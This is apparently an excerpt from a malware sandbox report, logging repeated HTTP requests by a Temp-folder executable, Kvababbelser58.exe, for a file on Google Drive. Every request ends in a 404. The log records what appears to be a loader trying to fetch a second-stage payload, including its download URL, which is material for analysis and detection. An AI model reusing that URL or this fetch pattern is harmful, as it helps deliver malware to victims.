                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:22 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC7kDl5kbcTA_lYeED2GMuqhKErebsSp3V5g69tQ69pXZ4YZO95TUh-Zzc2WEWnX8l6s
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:22 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-owwaFKU0NfiAYmjiDikvog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:22 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2SOeqcIZTu00IifbHwFcDA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      20 | 192.168.2.7 | 49989 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:23 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:23 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:23 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: script-src 'nonce-L8Kk5AwCpvzaWUzqfguhTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      21 | 192.168.2.7 | 49990 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:24 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:25 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC465sMTDEp3ooA4mTwWWXoSiJ0rumossrJ9iSeAZ1RTFaEuZex8ub0vpAGfwamMrreb
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:24 GMT
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-p5EoMlXxSrcDjMDtk6uGgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:25 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ps8b20btOn9YO1hrciMysw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      22 | 192.168.2.7 | 49991 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:25 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:26 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:26 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-ZVTFLfJ4PNgdraFcjkKquQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      23 | 192.168.2.7 | 49992 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:26 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:27 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgSY6dbrpVgWGHMfOY8F0UFdJ9Z0KveMhvzTpappJTYwx_Ps17BWNKVzmv1he_wyCsNJqel7NRQ
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:27 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-n8-_fx-xPXjID3G9y-_ePg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:27 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vbxZlM17RkRruLfOhLDPPQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      24 | 192.168.2.7 | 49993 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:28 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:28 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:28 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-DcKtXysVwIiMRsgQQwoC1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      25 | 192.168.2.7 | 49994 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:29 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:29 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQX0vdYM1Iova-R5sUZlx9ZdzEhl8_W2UiYIcbt25FN7r-laO14idiGfsa_rY_XGdTyZ7Nfibc
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:29 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-7aa_Hja7sXYGL4bArwtT4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:29 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AKUKgJBrhr52Ndf-VAVZRw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      26 | 192.168.2.7 | 49995 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:30 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:30 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:30 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-pOkPaRbp-Y3kGhv7JeX4hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      27 | 192.168.2.7 | 49996 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:31 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:31 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC6wYjaMnsKYP8Z_EKDepRHGTqY6CS_aMdTIqeXFZ7lvSxbrfMy-RHs7plxlN8ho-J4bkA7ca74
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
